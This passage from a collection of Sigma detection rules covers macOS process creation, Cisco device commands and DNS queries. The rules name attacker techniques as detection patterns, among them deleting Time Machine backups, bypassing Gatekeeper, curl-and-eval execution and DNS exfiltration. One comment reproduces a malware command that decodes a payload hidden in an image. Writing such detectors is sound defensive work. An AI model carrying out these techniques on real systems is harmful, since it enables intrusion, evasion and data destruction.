a753a6af-3126-426d-8bd0-26ebbcb92254 status: test description: Detects potential suspicious applet or osascript executing "osacompile". references: - https://redcanary.com/blog/mac-application-bundles/ author: Sohan G (D4rkCiph3r), Red Canary (Idea) date: 2023-04-03 tags: - attack.execution - attack.t1059.002 logsource: category: process_creation product: macos detection: selection: ParentImage|endswith: - '/applet' - '/osascript' CommandLine|contains: 'osacompile' condition: selection falsepositives: - Unknown level: medium ================================================ FILE: rules/macos/process_creation/proc_creation_macos_swvers_discovery.yml ================================================ title: System Information Discovery Using sw_vers id: 5de06a6f-673a-4fc0-8d48-bcfe3837b033 status: test description: Detects the use of "sw_vers" for system information discovery references: - https://www.virustotal.com/gui/file/d3fa64f63563fe958b75238742d1e473800cb5f49f5cb79d38d4aa3c93709026/behavior - https://www.virustotal.com/gui/file/03b71eaceadea05bc0eea5cddecaa05f245126d6b16cfcd0f3ba0442ac58dab3/behavior - https://ss64.com/osx/sw_vers.html author: Joseliyo Sanchez, @Joseliyo_Jstnk date: 2023-12-20 tags: - attack.discovery - attack.t1082 logsource: product: macos category: process_creation detection: # VT Query: 'behavior_processes:"sw_vers" and (behavior_processes:"-productVersion" or behavior_processes:"-productName" or behavior_processes:"-buildVersion") tag:dmg p:5+' selection_image: Image|endswith: '/sw_vers' selection_options: CommandLine|contains: - '-buildVersion' - '-productName' - '-productVersion' condition: all of selection_* falsepositives: - Legitimate administrative activities level: medium ================================================ FILE: rules/macos/process_creation/proc_creation_macos_sysadminctl_add_user_to_admin_group.yml ================================================ title: User Added To Admin Group Via Sysadminctl id: 
652c098d-dc11-4ba6-8566-c20e89042f2b related: - id: 0c1ffcf9-efa9-436e-ab68-23a9496ebf5b type: obsolete status: test description: Detects attempts to create and add an account to the admin group via "sysadminctl" references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-3---create-local-account-with-admin-privileges-using-sysadminctl-utility---macos - https://ss64.com/osx/sysadminctl.html author: Sohan G (D4rkCiph3r) date: 2023-03-19 tags: - attack.persistence - attack.defense-evasion - attack.initial-access - attack.privilege-escalation - attack.t1078.003 logsource: category: process_creation product: macos detection: selection: # Creates and adds new user to admin group Image|endswith: '/sysadminctl' CommandLine|contains|all: - ' -addUser ' - ' -admin ' condition: selection falsepositives: - Legitimate administration activities level: medium ================================================ FILE: rules/macos/process_creation/proc_creation_macos_sysadminctl_enable_guest_account.yml ================================================ title: Guest Account Enabled Via Sysadminctl id: d7329412-13bd-44ba-a072-3387f804a106 status: test description: Detects attempts to enable the guest account using the sysadminctl utility references: - https://ss64.com/osx/sysadminctl.html author: Sohan G (D4rkCiph3r) date: 2023-02-18 tags: - attack.privilege-escalation - attack.persistence - attack.defense-evasion - attack.initial-access - attack.t1078 - attack.t1078.001 logsource: category: process_creation product: macos detection: selection: Image|endswith: '/sysadminctl' CommandLine|contains|all: # By default the guest account is not active - ' -guestAccount' - ' on' condition: selection falsepositives: - Unknown level: low ================================================ FILE: rules/macos/process_creation/proc_creation_macos_sysctl_discovery.yml ================================================ title: System Information 
Discovery Via Sysctl - MacOS id: 6ff08e55-ea53-4f27-94a1-eff92e6d9d5c status: test description: | Detects the execution of "sysctl" with specific arguments that have been used by threat actors and malware. It provides system hardware information. This process is primarily used to detect and avoid virtualization and analysis environments. references: - https://www.loobins.io/binaries/sysctl/# - https://evasions.checkpoint.com/techniques/macos.html - https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/ - https://www.sentinelone.com/labs/20-common-tools-techniques-used-by-macos-threat-actors-malware/ - https://objective-see.org/blog/blog_0x1E.html - https://www.virustotal.com/gui/file/1c547a064494a35d6b5e6b459de183ab2720a22725e082bed6f6629211f7abc1/behavior - https://www.virustotal.com/gui/file/b4b1fc65f87b3dcfa35e2dbe8e0a34ad9d8a400bec332025c0a2e200671038aa/behavior author: Pratinav Chandra date: 2024-05-27 tags: - attack.defense-evasion - attack.t1497.001 - attack.discovery - attack.t1082 logsource: product: macos category: process_creation detection: selection_img: - Image|endswith: '/sysctl' - CommandLine|contains: 'sysctl' selection_cmd: CommandLine|contains: - 'hw.' - 'kern.' - 'machdep.' 
condition: all of selection_* falsepositives: - Legitimate administrative activities level: medium ================================================ FILE: rules/macos/process_creation/proc_creation_macos_system_network_connections_discovery.yml ================================================ title: System Network Connections Discovery - MacOs id: 9a7a0393-2144-4626-9bf1-7c2f5a7321db status: test description: Detects usage of system utilities to discover system network connections references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md author: Daniil Yugoslavskiy, oscd.community date: 2020-10-19 modified: 2022-12-28 tags: - attack.discovery - attack.t1049 logsource: category: process_creation product: macos detection: selection: Image|endswith: - '/who' - '/w' - '/last' - '/lsof' - '/netstat' condition: selection falsepositives: - Legitimate activities level: informational ================================================ FILE: rules/macos/process_creation/proc_creation_macos_system_profiler_discovery.yml ================================================ title: System Information Discovery Using System_Profiler id: 4809c683-059b-4935-879d-36835986f8cf status: test description: | Detects the execution of "system_profiler" with specific "Data Types" that have been seen being used by threat actors and malware. It provides system hardware and software configuration information. This process is primarily used for system information discovery. However, "system_profiler" can also be used to determine if virtualization software is being run for defense evasion purposes. 
references: - https://www.trendmicro.com/en_za/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html - https://www.sentinelone.com/wp-content/uploads/pdf-gen/1630910064/20-common-tools-techniques-used-by-macos-threat-actors-malware.pdf - https://ss64.com/mac/system_profiler.html - https://objective-see.org/blog/blog_0x62.html - https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/ - https://gist.github.com/nasbench/9a1ba4bc7094ea1b47bc42bf172961af author: Stephen Lincoln `@slincoln_aiq` (AttackIQ) date: 2024-01-02 tags: - attack.discovery - attack.defense-evasion - attack.t1082 - attack.t1497.001 logsource: product: macos category: process_creation detection: selection_img: - Image|endswith: '/system_profiler' - CommandLine|contains: 'system_profiler' selection_cmd: # Note: This list is based on CTI reporting. Threat actors might use other data types. Please refere to https://gist.github.com/nasbench/9a1ba4bc7094ea1b47bc42bf172961af for a full list CommandLine|contains: - 'SPApplicationsDataType' - 'SPHardwareDataType' - 'SPNetworkDataType' - 'SPUSBDataType' condition: all of selection_* falsepositives: - Legitimate administrative activities level: medium ================================================ FILE: rules/macos/process_creation/proc_creation_macos_system_shutdown_reboot.yml ================================================ title: System Shutdown/Reboot - MacOs id: 40b1fbe2-18ea-4ee7-be47-0294285811de status: test description: Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. 
references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md author: 'Igor Fits, Mikhail Larin, oscd.community' date: 2020-10-19 modified: 2022-11-26 tags: - attack.impact - attack.t1529 logsource: product: macos category: process_creation detection: selection: Image|endswith: - '/shutdown' - '/reboot' - '/halt' condition: selection falsepositives: - Legitimate administrative activity level: informational ================================================ FILE: rules/macos/process_creation/proc_creation_macos_tail_base64_decode_from_image.yml ================================================ title: Potential Base64 Decoded From Images id: 09a910bf-f71f-4737-9c40-88880ba5913d status: test description: | Detects the use of tail to extract bytes at an offset from an image and then decode the base64 value to create a new file with the decoded content. The detected execution is a bash one-liner. references: - https://www.virustotal.com/gui/file/16bafdf741e7a13137c489f3c8db1334f171c7cb13b62617d691b0a64783cc48/behavior - https://www.virustotal.com/gui/file/483fafc64a2b84197e1ef6a3f51e443f84dc5742602e08b9e8ec6ad690b34ed0/behavior author: Joseliyo Sanchez, @Joseliyo_Jstnk date: 2023-12-20 tags: - attack.defense-evasion - attack.t1140 logsource: product: macos category: process_creation detection: # Example: /bin/bash sh -c tail -c +21453 '/Volumes/Installer/Installer.app/Contents/Resources/workout-logo.jpeg' | base64 --decode > /tmp/54A0A2CD-FAD1-4D4D-AAF5-5266F6344ABE.zip # VT Query: 'behavior_processes:"tail" (behavior_processes:"jpeg" or behavior_processes:"jpg" or behavior_processes:"png" or behavior_processes:"gif") behavior_processes:"base64" behavior_processes:"--decode >" and tag:dmg' selection_image: Image|endswith: '/bash' selection_view: CommandLine|contains|all: - 'tail' - '-c' selection_b64: CommandLine|contains|all: - 'base64' - '-d' # Also covers "--decode" - '>' selection_files: 
CommandLine|contains: - '.avif' - '.gif' - '.jfif' - '.jpeg' - '.jpg' - '.pjp' - '.pjpeg' - '.png' - '.svg' - '.webp' condition: all of selection_* falsepositives: - Unknown level: high ================================================ FILE: rules/macos/process_creation/proc_creation_macos_tmutil_delete_backup.yml ================================================ title: Time Machine Backup Deletion Attempt Via Tmutil - MacOS id: 452df256-da78-427a-866f-49fa04417d74 status: test description: | Detects deletion attempts of MacOS Time Machine backups via the native backup utility "tmutil". An adversary may perform this action before launching a ransonware attack to prevent the victim from restoring their files. references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md#atomic-test-12---disable-time-machine - https://www.loobins.io/binaries/tmutil/ author: Pratinav Chandra date: 2024-05-29 tags: - attack.impact - attack.t1490 logsource: category: process_creation product: macos detection: selection_img: - Image|endswith: '/tmutil' - CommandLine|contains: 'tmutil' selection_cmd: CommandLine|contains: 'delete' condition: all of selection_* falsepositives: - Legitimate activities level: medium ================================================ FILE: rules/macos/process_creation/proc_creation_macos_tmutil_disable_backup.yml ================================================ title: Time Machine Backup Disabled Via Tmutil - MacOS id: 2c95fa8a-8b8d-4787-afce-7117ceb8e3da status: test description: | Detects disabling of Time Machine (Apple's automated backup utility software) via the native macOS backup utility "tmutil". An attacker can use this to prevent backups from occurring. 
references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md#atomic-test-12---disable-time-machine - https://www.loobins.io/binaries/tmutil/ author: Pratinav Chandra date: 2024-05-29 tags: - attack.impact - attack.t1490 logsource: category: process_creation product: macos detection: selection_img: - Image|endswith: '/tmutil' - CommandLine|contains: 'tmutil' selection_cmd: CommandLine|contains: 'disable' condition: all of selection_* falsepositives: - Legitimate administrator activity level: medium ================================================ FILE: rules/macos/process_creation/proc_creation_macos_tmutil_exclude_file_from_backup.yml ================================================ title: New File Exclusion Added To Time Machine Via Tmutil - MacOS id: 9acf45ed-3a26-4062-bf08-56857613eb52 status: test description: | Detects the addition of a new file or path exclusion to MacOS Time Machine via the "tmutil" utility. An adversary could exclude a path from Time Machine backups to prevent certain files from being backed up. references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md#atomic-test-12---disable-time-machine - https://www.loobins.io/binaries/tmutil/ author: Pratinav Chandra date: 2024-05-29 tags: - attack.impact - attack.t1490 logsource: category: process_creation product: macos detection: selection_img: - Image|endswith: '/tmutil' - CommandLine|contains: 'tmutil' selection_cmd: CommandLine|contains: 'addexclusion' condition: all of selection_* falsepositives: - Legitimate administrator activity level: medium ================================================ FILE: rules/macos/process_creation/proc_creation_macos_wizardupdate_malware_infection.yml ================================================ title: Potential WizardUpdate Malware Infection id: f68c4a4f-19ef-4817-952c-50dce331f4b0 status: test description: Detects the execution traces of the WizardUpdate malware. 
WizardUpdate is a macOS trojan that attempts to infiltrate macOS machines to steal data and it is associated with other types of malicious payloads, increasing the chances of multiple infections on a device. references: - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-c68a1fcbf7a3f80c87225d7fdc031f691e9f3b6a14a36754be00762bfe6eae97 - https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset - https://www.microsoft.com/security/blog/2022/02/02/the-evolution-of-a-mac-trojan-updateagents-progression/ author: Tim Rauch (rule), Elastic (idea) date: 2022-10-17 tags: - attack.command-and-control logsource: category: process_creation product: macos detection: selection_1: Image|endswith: '/sh' CommandLine|contains|all: - '=$(curl ' - 'eval' selection_2: Image|endswith: '/curl' CommandLine|contains: '_intermediate_agent_' condition: 1 of selection_* falsepositives: - Unknown level: high ================================================ FILE: rules/macos/process_creation/proc_creation_macos_xattr_gatekeeper_bypass.yml ================================================ title: Gatekeeper Bypass via Xattr id: f5141b6d-9f42-41c6-a7bf-2a780678b29b status: test description: Detects macOS Gatekeeper bypass via xattr utility references: - https://github.com/redcanaryco/atomic-red-team/blob/1fed40dc7e48f16ed44dcdd9c73b9222a70cca85/atomics/T1553.001/T1553.001.md - https://www.loobins.io/binaries/xattr/ author: Daniil Yugoslavskiy, oscd.community date: 2020-10-19 modified: 2024-04-18 tags: - attack.defense-evasion - attack.t1553.001 logsource: category: process_creation product: macos detection: selection: Image|endswith: '/xattr' CommandLine|contains|all: - '-d' - 'com.apple.quarantine' condition: selection falsepositives: - Legitimate activities level: low ================================================ FILE: rules/macos/process_creation/proc_creation_macos_xcsset_malware_infection.yml 
================================================ title: Potential XCSSET Malware Infection id: 47d65ac0-c06f-4ba2-a2e3-d263139d0f51 status: test description: Identifies the execution traces of the XCSSET malware. XCSSET is a macOS trojan that primarily spreads via Xcode projects and maliciously modifies applications. Infected users are also vulnerable to having their credentials, accounts, and other vital data stolen. references: - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-f5deb07688e1a8dec9530bc3071967b2da5c16b482e671812b864c37beb28f08 - https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset author: Tim Rauch (rule), Elastic (idea) date: 2022-10-17 tags: - attack.command-and-control logsource: category: process_creation product: macos detection: selection_1_curl: ParentImage|endswith: '/bash' Image|endswith: '/curl' CommandLine|contains: - '/sys/log.php' - '/sys/prepod.php' - '/sys/bin/Pods' selection_1_https: CommandLine|contains: 'https://' selection_other_1: ParentImage|endswith: '/bash' Image|endswith: '/osacompile' CommandLine|contains|all: - '/Users/' - '/Library/Group Containers/' selection_other_2: ParentImage|endswith: '/bash' Image|endswith: '/plutil' CommandLine|contains|all: - 'LSUIElement' - '/Users/' - '/Library/Group Containers/' selection_other_3: Image|endswith: '/zip' CommandLine|contains|all: - '-r' - '/Users/' - '/Library/Group Containers/' condition: all of selection_1_* or 1 of selection_other_* falsepositives: - Unknown level: medium ================================================ FILE: rules/network/cisco/aaa/cisco_cli_clear_logs.yml ================================================ title: Cisco Clear Logs id: ceb407f6-8277-439b-951f-e4210e3ed956 status: test description: Clear command history in network OS which is used for defense evasion references: - 
https://www.cisco.com/c/en/us/td/docs/switches/datacenter/nexus5000/sw/command/reference/sysmgmt/n5k-sysmgmt-cr/n5k-sm_cmds_c.html - https://www.cisco.com/c/en/us/td/docs/ios/12_2sr/12_2sra/feature/guide/srmgtint.html#wp1127609 author: Austin Clark date: 2019-08-12 modified: 2023-05-26 tags: - attack.defense-evasion - attack.t1070.003 logsource: product: cisco service: aaa detection: keywords: - 'clear logging' - 'clear archive' condition: keywords falsepositives: - Legitimate administrators may run these commands level: high ================================================ FILE: rules/network/cisco/aaa/cisco_cli_collect_data.yml ================================================ title: Cisco Collect Data id: cd072b25-a418-4f98-8ebc-5093fb38fe1a status: test description: Collect pertinent data from the configuration files references: - https://blog.router-switch.com/2013/11/show-running-config/ - https://www.cisco.com/E-Learning/bulk/public/tac/cim/cib/using_cisco_ios_software/cmdrefs/show_startup-config.htm - https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/config-mgmt/configuration/15-sy/config-mgmt-15-sy-book/cm-config-diff.html author: Austin Clark date: 2019-08-11 modified: 2023-01-04 tags: - attack.discovery - attack.credential-access - attack.collection - attack.t1087.001 - attack.t1552.001 - attack.t1005 logsource: product: cisco service: aaa detection: keywords: - 'show running-config' - 'show startup-config' - 'show archive config' - 'more' condition: keywords falsepositives: - Commonly run by administrators level: low ================================================ FILE: rules/network/cisco/aaa/cisco_cli_crypto_actions.yml ================================================ title: Cisco Crypto Commands id: 1f978c6a-4415-47fb-aca5-736a44d7ca3d status: test description: Show when private keys are being exported from the device, or when new certificates are installed references: - 
https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/a1/sec-a1-cr-book/sec-a1-cr-book_chapter_0111.html author: Austin Clark date: 2019-08-12 modified: 2023-01-04 tags: - attack.credential-access - attack.defense-evasion - attack.t1553.004 - attack.t1552.004 logsource: product: cisco service: aaa detection: keywords: - 'crypto pki export' - 'crypto pki import' - 'crypto pki trustpoint' condition: keywords falsepositives: - Not commonly run by administrators. Also whitelist your known good certificates level: high ================================================ FILE: rules/network/cisco/aaa/cisco_cli_disable_logging.yml ================================================ title: Cisco Disabling Logging id: 9e8f6035-88bf-4a63-96b6-b17c0508257e status: test description: Turn off logging locally or remote references: - https://www.cisco.com/en/US/docs/ios/security/command/reference/sec_a2.pdf author: Austin Clark date: 2019-08-11 modified: 2023-01-04 tags: - attack.defense-evasion - attack.t1562.001 logsource: product: cisco service: aaa detection: keywords: - 'no logging' - 'no aaa new-model' condition: keywords falsepositives: - Unknown level: high ================================================ FILE: rules/network/cisco/aaa/cisco_cli_discovery.yml ================================================ title: Cisco Discovery id: 9705a6a1-6db6-4a16-a987-15b7151e299b status: test description: Find information about network devices that is not stored in config files references: - https://www.cisco.com/c/en/us/td/docs/server_nw_virtual/2-5_release/command_reference/show.html author: Austin Clark date: 2019-08-12 modified: 2023-01-04 tags: - attack.discovery - attack.t1083 - attack.t1201 - attack.t1057 - attack.t1018 - attack.t1082 - attack.t1016 - attack.t1049 - attack.t1033 - attack.t1124 logsource: product: cisco service: aaa detection: keywords: - 'dir' - 'show arp' - 'show cdp' - 'show clock' - 'show ip interface' - 'show ip route' - 'show ip sockets' - 'show 
processes' - 'show ssh' - 'show users' - 'show version' condition: keywords falsepositives: - Commonly used by administrators for troubleshooting level: low ================================================ FILE: rules/network/cisco/aaa/cisco_cli_dos.yml ================================================ title: Cisco Denial of Service id: d94a35f0-7a29-45f6-90a0-80df6159967c status: test description: Detect a system being shutdown or put into different boot mode author: Austin Clark date: 2019-08-15 modified: 2023-01-04 tags: - attack.impact - attack.t1495 - attack.t1529 - attack.t1565.001 logsource: product: cisco service: aaa detection: keywords: - 'shutdown' - 'config-register 0x2100' - 'config-register 0x2142' condition: keywords falsepositives: - Legitimate administrators may run these commands, though rarely. level: medium ================================================ FILE: rules/network/cisco/aaa/cisco_cli_file_deletion.yml ================================================ title: Cisco File Deletion id: 71d65515-c436-43c0-841b-236b1f32c21e status: test description: See what files are being deleted from flash file systems author: Austin Clark date: 2019-08-12 modified: 2023-01-04 tags: - attack.defense-evasion - attack.impact - attack.t1070.004 - attack.t1561.001 - attack.t1561.002 logsource: product: cisco service: aaa detection: keywords: - 'erase' - 'delete' - 'format' condition: keywords falsepositives: - Will be used sometimes by admins to clean up local flash space level: medium ================================================ FILE: rules/network/cisco/aaa/cisco_cli_input_capture.yml ================================================ title: Cisco Show Commands Input id: b094d9fb-b1ad-4650-9f1a-fb7be9f1d34b status: test description: See what commands are being input into the device by other people, full credentials can be in the history author: Austin Clark date: 2019-08-11 modified: 2023-01-04 tags: - attack.credential-access - attack.t1552.003 logsource: 
product: cisco service: aaa detection: keywords: - 'show history' - 'show history all' - 'show logging' condition: keywords falsepositives: - Not commonly run by administrators, especially if remote logging is configured level: medium ================================================ FILE: rules/network/cisco/aaa/cisco_cli_local_accounts.yml ================================================ title: Cisco Local Accounts id: 6d844f0f-1c18-41af-8f19-33e7654edfc3 status: test description: Find local accounts being created or modified as well as remote authentication configurations author: Austin Clark date: 2019-08-12 modified: 2023-01-04 tags: - attack.privilege-escalation - attack.persistence - attack.t1136.001 - attack.t1098 logsource: product: cisco service: aaa detection: keywords: - 'username' - 'aaa' condition: keywords falsepositives: - When remote authentication is in place, this should not change often level: high ================================================ FILE: rules/network/cisco/aaa/cisco_cli_modify_config.yml ================================================ title: Cisco Modify Configuration id: 671ffc77-50a7-464f-9e3d-9ea2b493b26b status: test description: Modifications to a config that will serve an adversary's impacts or persistence author: Austin Clark date: 2019-08-12 modified: 2025-04-28 tags: - attack.privilege-escalation - attack.execution - attack.persistence - attack.impact - attack.t1490 - attack.t1505 - attack.t1565.002 - attack.t1053 logsource: product: cisco service: aaa detection: keywords: - 'ip http server' - 'ip https server' - 'kron policy-list' - 'kron occurrence' - 'policy-list' - 'access-list' - 'ip access-group' - 'archive maximum' - 'ntp server' condition: keywords falsepositives: - Legitimate administrators may run these commands level: medium ================================================ FILE: rules/network/cisco/aaa/cisco_cli_moving_data.yml ================================================ title: Cisco Stage Data id: 
5e51acb2-bcbe-435b-99c6-0e3cd5e2aa59 status: test description: Various protocols maybe used to put data on the device for exfil or infil author: Austin Clark date: 2019-08-12 modified: 2023-01-04 tags: - attack.collection - attack.lateral-movement - attack.command-and-control - attack.exfiltration - attack.t1074 - attack.t1105 - attack.t1560.001 logsource: product: cisco service: aaa detection: keywords: - 'tftp' - 'rcp' - 'puts' - 'copy' - 'configure replace' - 'archive tar' condition: keywords falsepositives: - Generally used to copy configs or IOS images level: low ================================================ FILE: rules/network/cisco/aaa/cisco_cli_net_sniff.yml ================================================ title: Cisco Sniffing id: b9e1f193-d236-4451-aaae-2f3d2102120d status: test description: Show when a monitor or a span/rspan is setup or modified author: Austin Clark date: 2019-08-11 modified: 2023-01-04 tags: - attack.credential-access - attack.discovery - attack.t1040 logsource: product: cisco service: aaa detection: keywords: - 'monitor capture point' - 'set span' - 'set rspan' condition: keywords falsepositives: - Admins may setup new or modify old spans, or use a monitor for troubleshooting level: medium ================================================ FILE: rules/network/cisco/bgp/cisco_bgp_md5_auth_failed.yml ================================================ title: Cisco BGP Authentication Failures id: 56fa3cd6-f8d6-4520-a8c7-607292971886 status: test description: Detects BGP failures which may be indicative of brute force attacks to manipulate routing references: - https://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf author: Tim Brown date: 2023-01-09 modified: 2023-01-23 tags: - attack.initial-access - attack.persistence - attack.privilege-escalation - attack.defense-evasion - attack.credential-access - attack.collection - attack.t1078 - attack.t1110 - attack.t1557 logsource: product: cisco service: bgp definition: 
'Requirements: cisco bgp logs need to be enabled and ingested' detection: keywords_bgp_cisco: '|all': - ':179' # Protocol - 'IP-TCP-3-BADAUTH' condition: keywords_bgp_cisco falsepositives: - Unlikely. Except due to misconfigurations level: low ================================================ FILE: rules/network/cisco/ldp/cisco_ldp_md5_auth_failed.yml ================================================ title: Cisco LDP Authentication Failures id: 50e606bf-04ce-4ca7-9d54-3449494bbd4b status: test description: Detects LDP failures which may be indicative of brute force attacks to manipulate MPLS labels references: - https://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf author: Tim Brown date: 2023-01-09 tags: - attack.initial-access - attack.persistence - attack.privilege-escalation - attack.defense-evasion - attack.credential-access - attack.collection - attack.t1078 - attack.t1110 - attack.t1557 logsource: product: cisco service: ldp definition: 'Requirements: cisco ldp logs need to be enabled and ingested' detection: selection_protocol: - 'LDP' selection_keywords: - 'SOCKET_TCP_PACKET_MD5_AUTHEN_FAIL' - 'TCPMD5AuthenFail' condition: selection_protocol and selection_keywords falsepositives: - Unlikely. 
Except due to misconfigurations level: low ================================================ FILE: rules/network/dns/net_dns_external_service_interaction_domains.yml ================================================ title: DNS Query to External Service Interaction Domains id: aff715fa-4dd5-497a-8db3-910bea555566 status: test description: | Detects suspicious DNS queries to external service interaction domains often used for out-of-band interactions after successful RCE references: - https://twitter.com/breakersall/status/1533493587828260866 - https://www.bitdefender.com/en-us/blog/businessinsights/bitdefender-advisory-critical-unauthenticated-rce-windows-server-update-services-cve-2025-59287 - https://github.com/SigmaHQ/sigma/pull/5724#issuecomment-3466382234 author: Florian Roth (Nextron Systems), Matt Kelly (list of domains) date: 2022-06-07 modified: 2026-01-24 tags: - attack.initial-access - attack.t1190 - attack.reconnaissance - attack.t1595.002 logsource: category: dns detection: selection: query|endswith: - '.burpcollaborator.net' # Portswigger Burpsuite Collaborator - '.canarytokens.com' # Thinkst Canary Canarytokens - '.ceye.io' - '.ddns.1443.eu.org' # dig.pm - '.ddns.bypass.eu.org' # dig.pm - '.ddns.xn--gg8h.eu.org' # dig.pm - '.digimg.store' # dnslog.ink - '.dns.su18.org' # javaweb.org - '.dnshook.site' # webhook.site - '.dnslog.cn' - '.dnslog.ink' # dnslog.ink - '.instances.httpworkbench.com' # httpworkbench.com - '.interact.sh' # Project Discovery Interactsh - '.log.dnslog.pp.ua' # dnslog.org - '.log.dnslog.qzz.io' # dnslog.org - '.log.dnslogs.dpdns.org' # dnslog.org - '.log.javaweb.org' # javaweb.org - '.log.nat.cloudns.ph' # dnslog.org - '.oast.fun' # Project Discovery Interactsh - '.oast.live' # Project Discovery Interactsh - '.oast.me' # Project Discovery Interactsh - '.oast.online' # Project Discovery Interactsh - '.oast.pro' # Project Discovery Interactsh - '.oast.site' # Project Discovery Interactsh - '.oastify.com' # Portswigger Burpsuite 
Collaborator - '.p8.lol' # javaweb.org - '.requestbin.net' filter_main_polling: query|contains: 'polling.oastify.com' condition: selection and not 1 of filter_main_* falsepositives: - Legitimate security scanning. level: high ================================================ FILE: rules/network/dns/net_dns_mal_cobaltstrike.yml ================================================ title: Cobalt Strike DNS Beaconing id: 2975af79-28c4-4d2f-a951-9095f229df29 status: test description: Detects suspicious DNS queries known from Cobalt Strike beacons references: - https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns - https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/ author: Florian Roth (Nextron Systems) date: 2018-05-10 modified: 2022-10-09 tags: - attack.command-and-control - attack.t1071.004 logsource: category: dns detection: selection1: query|startswith: - 'aaa.stage.' - 'post.1' selection2: query|contains: '.stage.123456.' condition: 1 of selection* falsepositives: - Unknown level: critical ================================================ FILE: rules/network/dns/net_dns_pua_cryptocoin_mining_xmr.yml ================================================ title: Monero Crypto Coin Mining Pool Lookup id: b593fd50-7335-4682-a36c-4edcb68e4641 status: stable description: Detects suspicious DNS queries to Monero mining pools references: - https://www.nextron-systems.com/2021/10/24/monero-mining-pool-fqdns/ author: Florian Roth (Nextron Systems) date: 2021-10-24 tags: - attack.impact - attack.t1496 - attack.exfiltration - attack.t1567 logsource: category: dns detection: selection: query|contains: - 'pool.minexmr.com' - 'fr.minexmr.com' - 'de.minexmr.com' - 'sg.minexmr.com' - 'ca.minexmr.com' - 'us-west.minexmr.com' - 'pool.supportxmr.com' - 'mine.c3pool.com' - 'xmr-eu1.nanopool.org' - 'xmr-eu2.nanopool.org' - 'xmr-us-east1.nanopool.org' - 'xmr-us-west1.nanopool.org' - 'xmr-asia1.nanopool.org' - 'xmr-jp1.nanopool.org' - 'xmr-au1.nanopool.org' - 
'xmr.2miners.com' - 'xmr.hashcity.org' - 'xmr.f2pool.com' - 'xmrpool.eu' - 'pool.hashvault.pro' condition: selection falsepositives: - Legitimate crypto coin mining level: high ================================================ FILE: rules/network/dns/net_dns_susp_b64_queries.yml ================================================ title: Suspicious DNS Query with B64 Encoded String id: 4153a907-2451-4e4f-a578-c52bb6881432 status: test description: Detects suspicious DNS queries using base64 encoding references: - https://github.com/krmaxwell/dns-exfiltration author: Florian Roth (Nextron Systems) date: 2018-05-10 modified: 2022-10-09 tags: - attack.exfiltration - attack.t1048.003 - attack.command-and-control - attack.t1071.004 logsource: category: dns detection: selection: query|contains: '==.' condition: selection falsepositives: - Unknown level: medium ================================================ FILE: rules/network/dns/net_dns_susp_telegram_api.yml ================================================ title: Telegram Bot API Request id: c64c5175-5189-431b-a55e-6d9882158251 status: test description: Detects suspicious DNS queries to api.telegram.org used by Telegram Bots of any kind references: - https://core.telegram.org/bots/faq - https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/ - https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/ - https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/ author: Florian Roth (Nextron Systems) date: 2018-06-05 modified: 2022-10-09 tags: - attack.command-and-control - attack.t1102.002 logsource: category: dns detection: selection: query: 'api.telegram.org' # Telegram Bot API Request https://core.telegram.org/bots/faq condition: selection falsepositives: - Legitimate use of Telegram bots in the company level: medium 
================================================ FILE: rules/network/dns/net_dns_susp_txt_exec_strings.yml ================================================ title: DNS TXT Answer with Possible Execution Strings id: 8ae51330-899c-4641-8125-e39f2e07da72 status: test description: Detects strings used in command execution in DNS TXT Answer references: - https://twitter.com/stvemillertime/status/1024707932447854592 - https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Backdoors/DNS_TXT_Pwnage.ps1 author: Markus Neis date: 2018-08-08 modified: 2021-11-27 tags: - attack.command-and-control - attack.t1071.004 logsource: category: dns detection: selection: record_type: 'TXT' answer|contains: - 'IEX' - 'Invoke-Expression' - 'cmd.exe' condition: selection falsepositives: - Unknown level: high ================================================ FILE: rules/network/dns/net_dns_wannacry_killswitch_domain.yml ================================================ title: Wannacry Killswitch Domain id: 3eaf6218-3bed-4d8a-8707-274096f12a18 status: test description: Detects wannacry killswitch domain dns queries references: - https://www.mandiant.com/resources/blog/wannacry-ransomware-campaign author: Mike Wade date: 2020-09-16 modified: 2022-03-24 tags: - attack.command-and-control - attack.t1071.001 logsource: category: dns detection: selection: query: - 'ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.testing' - 'ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.test' - 'ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com' - 'ayylmaotjhsstasdfasdfasdfasdfasdfasdfasdf.com' - 'iuqssfsodp9ifjaposdfjhgosurijfaewrwergwea.com' condition: selection falsepositives: - Analyst testing level: high ================================================ FILE: rules/network/firewall/net_firewall_cleartext_protocols.yml ================================================ title: Cleartext Protocol Usage id: d7fb8f0e-bd5f-45c2-b467-19571c490d7e status: stable description: | Ensure that all account 
